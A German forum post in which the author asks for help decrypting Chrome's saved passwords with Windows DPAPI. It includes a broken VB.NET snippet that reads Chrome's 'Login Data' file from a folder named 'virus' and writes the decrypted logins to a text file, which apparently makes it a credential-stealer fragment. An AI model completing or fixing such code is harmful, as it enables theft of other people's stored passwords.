Hallo da ich mal wieder Hilfe brauche habe ich mir über legt mich an euch zu wenden. Meine Frage ist wie Chrome die Passwörter verschlüsselt. Ich las schon in diversen Foren das Chrome einfach die Crypt32.dll.Protect Method verwendet um seine Dateien zu verschlüsseln. Allerdings ließ sich es mit der Unprotect Methode nicht mehr entschlüsseln...
Ich bekomme immer diesenFehler:
Leider wurde mir immer der Fehler angezeigt das ich dieses Format nicht benutzten darf... Vlt kann mir ja jemand sagen welches Format ich benutzten darf
Und hier habe ich nochmal meinen Code, programmiert wurde mit visual basic im .net Framework 2.0
Private Sub GetChromePasswords() Dim data() As Byte = File.ReadAllBytes("C:\Users\Adrian\AppData\Roaming\virus\Login Data") Try Dim chromePasswords() As Byte = ProtectedData.Unprotect(data, Nothing, DataProtectionScope.CurrentUser) 'Hier ist der Fehler.. glaub ich FileCreate("c:\users\" + rUser + "\appdata\roaming\" + appDataFolder + "logins.txt", Encoding.UTF8.GetString(chromePasswords)) Catch ex As Exception MessageBox.Show(ex.ToString) End Try End Sub
Ich hoffe das ihr mir helfen könnt...
Danke schonmal im Vorraus